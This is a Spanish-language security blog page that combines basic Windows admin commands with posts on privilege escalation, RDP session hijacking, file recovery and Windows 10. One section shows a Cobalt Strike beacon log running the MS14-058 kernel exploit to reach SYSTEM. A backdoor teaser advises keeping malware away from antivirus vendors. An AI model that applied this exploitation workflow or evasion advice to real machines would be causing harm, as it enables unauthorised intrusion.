#Sysadmineando en Windows – Comandos útiles

Ahora, un poco de comandos útiles, pero, para Windows. Si bien son algo básicos, pretendo que luego sean más avanzados, no dejan de ser una ayuda fundamental en algún troubleshooting. ¡ Espero que les sirvan !

1: System File Checker

Es común que si fuiste infectado por malware éstos intenten reemplazar tus archivos del sistema por archivos maliciosos, tratando de tomar el control de tu máquina. SFC (system file checker) puede ser usado para verificar la integridad de todos los archivos del sistema Windows. El comando para utilizarlo es:

sfc /scannow

2: File Signature Verification

Una forma de verificar la integridad de un sistema es corroborando que todos los archivos estén firmados digitalmente. Esto se puede hacer a través del comando sigverif (Signature Verification). Si bien se lanza desde la línea de comandos, su uso se realiza a través de una interfaz GUI. Su meta es simple, avisar que archivos del sistema se encuentran o no firmados.

sigverif

3: driverquery

Tener instalado drivers que no sean los correctos, puede derivar en varios problemas en el sistema. Si se quiere saber cuáles están instalados, se utiliza el comando driverquery, el cual proveerá información detallada de cada driver que esté siendo utilizado. en caso que se quiera más información, agregar el argumento -v.

driverquery
driverquery -v

4: nslookup

Esta herramienta sirve para verificar que las resoluciones DNS estén funcionando correctamente. Cuando se corre nslookup contra un hostname, la herramienta mostrará como fue resuelto en nombre, así como también que servidor DNS se utilizó durante el lookup. Cabe destacar que es muy útil en casos de troubleshooting relacionados a registros DNS.

 

nslookup dc1.contoso.com

5: Ping

La más conocida y utilizada para diagnóstico. Es utilizada para verificar conexiones TCP/IP de forma básica, utilizando el protocolo ICMP.

ping 192.168.1.1

6: Pathping

Si bien ping hace un buen trabajo notificando cuando dos máquinas pueden comunicarse entre sí a través de TCP/IP, en el caso que no se puedan conectar la salida de error es muy limitada (casi nula). Allí es cuando pathping entra en juego. Ésta herramienta está diseñada para entornos en los que existan uno o más routers entre los hosts. Se envía una serie de paquetes a cada router que se encuentra en el path de destino del host en un esfuerzo para determinar si el router está trabajando lento (problemas con latencia, o lo que sea) o bien, dropeando paquetes.

pathping 192.168.1.1

7: Repair-bde

Si un dispositivo cifrado con BitLocker tiene problemas, a veces se puede recuperar la información utilizando repair-bde. Para utilizarlo, es necesario declarar un dispositivo para poder escribir toda la información recuperada, así como también la key de recuperación o contraseña de BitLocker.

repair-bde <source> <destination> -rk | rp <source>

8: Tasklist

Este comando está diseñado para proveer información sobre las tareas que están corriendo en un sistema Windows.

tasklist

Tiene varias funcionalidades más, las cuales se invocan con argumentos. Por ejemplo, utilizando -m, permite que tasklist muestre todos los módulos DLL asociados a una tarea en particular. Por otro lado, -svc muestra todos los servicios que soportan las tareas.

tasklist -m
tasklist -svc

9: Taskkill

Éste comando es para finalizar tareas, tanto como por nombre como por ID. Su sintaxis es relativamente fácil, tal como se muestra en los siguientes ejemplos.

taskkill -pid 4104
taskkill -im iexplore.exe

Contenido original en inglés, disponible en Tech Republic.

#sherlock, un script en #PowerShell para escalar privilegios

Sherlock es un script en PowerShell de Rasta Mouse que revisa rápidamente la existencia de parches para vulnerabilidades de escalado de privilegios en Microsoft Windows.

Actualmente busca:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : ‘mrxdav.sys’ WebDAV
  • MS16-032 : Secondary Logon Handle Probado en: Windows 7 SP1 32-bit Windows 7 SP1 64-bit Windows 8 64-bit Windows 10 64-bit

Uso básico: 

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-AllVulns
[*] Tasked beacon to run: Find-AllVulns
[+] host called home, sent: 21 bytes
[+] received output:

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : Font Driver Buffer Overflow
MSBulletin : MS15-078
CVEID      : 2015-2426, 2015-2433
Link       : https://www.exploit-db.com/exploits/38222/
VulnStatus : Not Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

[+] established link to parent beacon: 192.168.56.105
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)


Proyecto Github: https://github.com/rasta-mouse/Sherlock

Fuente: hackplayers

Robando sesiones de usuarios en Windows … o ¿funcionalidad de Windows?

¿Se puede robar a una sesión de usuario de Windows usando sólo el Administrador de Tareas y/o el CMD? Parece que sí. Eso es lo que ha redescubierto el investigador en seguridad Alexander Korznikov y ha despertado todo tipo de discusiones.

El método tiene varias limitaciones.

  1. Se requiere privilegios de administración sobre el sistema.
  2. La cuenta a secuestrar debe haber iniciado sesión.
  3. La cuenta a secuestrar no debería haber cerrado su sesión (solo la ha bloqueado)
  4. Se requiere acceso físico al PC en el que se encuentra la cuenta objetivo, (parece) que no se puede realizar de forma remota.

Que utilicemos la palabra “redescubierto” no es casual. El “truco” es posible gracias a un bug que ya tiene seis años de antigüedad pero que, al parecer, Microsoft todavía no ha solucionado. Se puede ver el error en funcionamiento en el siguiente vídeo (via Task Manager, via CMD, via servicio)

Según se puede observar en el vídeo, para poder explotar el bug hay que acceder al sistema con una cuenta cualquiera que tenga privilegios de administración. Antes de eso, la cuenta objetivo debe haber iniciado sesión en el sistema y estar operativa. Además, el usuario debe haber usado “Cambiar usuario” o “Bloquear” en lugar de “Cerrar sesión” para abandonar el PC.

En este caso no es necesario usar ningún tipo de malware, ni tener conocimientos avanzados de cualquiera de las materias que citamos al principio del artículo. Es decir, cualquiera con conocimientos básicos de informática podría aprovecharse del bug si sabe cómo.

Este “bug o funcionalidad” está presente en todas las versiones a partir de Windows 7 y hasta Windows 2016.

Actualización: existe una gran discusión de si este hallazgo corresponde realmente a un bug o al diseño de Windows, el cual que sería menospreciado por ser necesario acceso local al sistema. Por eso, Kevin Beaumont realizó una PoC y demostró cómo se puede utilizar este “truco” para lograr un RDP session hijacking, dando lugar a que efectivamente este sería un vector real de ataque.

Hasta ahora existen estas formas de llevar a cabo el ataque y seguramente irán apareciendo más con el pasar de los días:

Fuente: Genbeta | Alexander Korznikov | Kevin Beaumont

Recuperando archivos borrados de nuestra Mac y Windows

Mucha gente cree que no es posible recuperar archivos borrados una vez que se ha vaciado la papelera de reciclaje, mucho menos luego de que se ha formateado el disco. Están equivocados. Gracias a la forma en la que funcionan los dispositivos de almacenamiento, los datos aún después de borrados, pueden permanecer intactos en los sectores que ocupan. Todo depende de si se han sobrescrito ya con algo más y es ahí donde se hacen ilegibles.

Existen varias herramientas para intentar recuperar los datos que hemos perdido, ya sea de nuestro disco duro, SSD, o memoria flash. Hoy hablaremos de una sumamente buena, fácil de usar, y además gratuita: Disk Drill.

Recupera documentos, imágenes, música o vídeos perdidos

recuperar archivos borrados en Windows

Read More

Tomando el control de un Windows 10

Comparto una simple forma de generar un backdoor indetectable para Windows 10. Me pareció un buen procedimiento sin tantas vueltas. A la fuente original (del colega CreadPag) voy a corregir algunas líneas para poder entender mejor.

El otro día estaba jugando con un backdoor que era indetectable para todos los AV’s; pero como hay personas que scanean su malware antes de usarlo en ataque, algunos de ellos cometen el error de publicarlo en VirusTotal. Recuerda que es una empresa que reporta, obviamente que por dinero, el malware a las empresas de AV.

Aquí hay dos paginas donde puedes scanearlo y que no sea compartido para esas compañías de antivirus.

Screenshot from 2016-02-26 13-28-33

Aquí puedes encontrar esta pagina se llama https://virusscan.jotti.org

Screenshot from 2016-02-26 13-28-27

Read More

¿Estás al tanto de lo que llega en Windows 10?

Windows 10 llega este miércoles con la intención de seguir innovando y poder mejorar la experiencia de los usuarios.

Como se siente Windows 10

Como se siente Windows 10

Si bien son rumores que se revelarán en solo unas horas cuando comience el evento de la compañía, éstas son las que más rumores generaron:

 

  • Unidad: Se espera que Windows 10 tenga la capacidad de ejecutar aplicaciones que correrán en todas las plataformas de la empresa -o al menos las más famosas-. Tanto smartphones, Xbox One, tabletas con el sistema operativo o computadoras.
  • ¿El adiós a Internet Explorer?: Podría terminar desapareciendo después de años de caída constante. El reemplazo podría ser Spartan, que llegaría para competir con Google Chrome y Firefox. No significa que desaparecerá para siempre, sino que ambos coexistirán por una cuestión de compatibilidad.
  • La vuelta del botón Inicio: Una de las más grandes quejas de los usuarios es que en Windows 8 el botón de Inicio, famoso desde hace años, había desaparecido. Eso volverá y hará todo más simple.
  • Cortana: Se trata de un asistente personal de voz que ya está disponible en los teléfonos con el sistema operativo de la empresa. También se incorporaría en la versión de escritorio.
  • App para Xbox One: La compañía habló con medios como The Verge hace tiempo y anunció que permitirían, en algún momento, comenzar videojuegos en la PC y terminarlos en la consola. Éste podría ser el momento.
  • Varios escritorios: Así como ya tiene Mac OS X y Linux, Windows 10 tendría varios escritorios para poder trabajar de manera más cómoda.

 

¡Gracias por leer!

DynamicSec.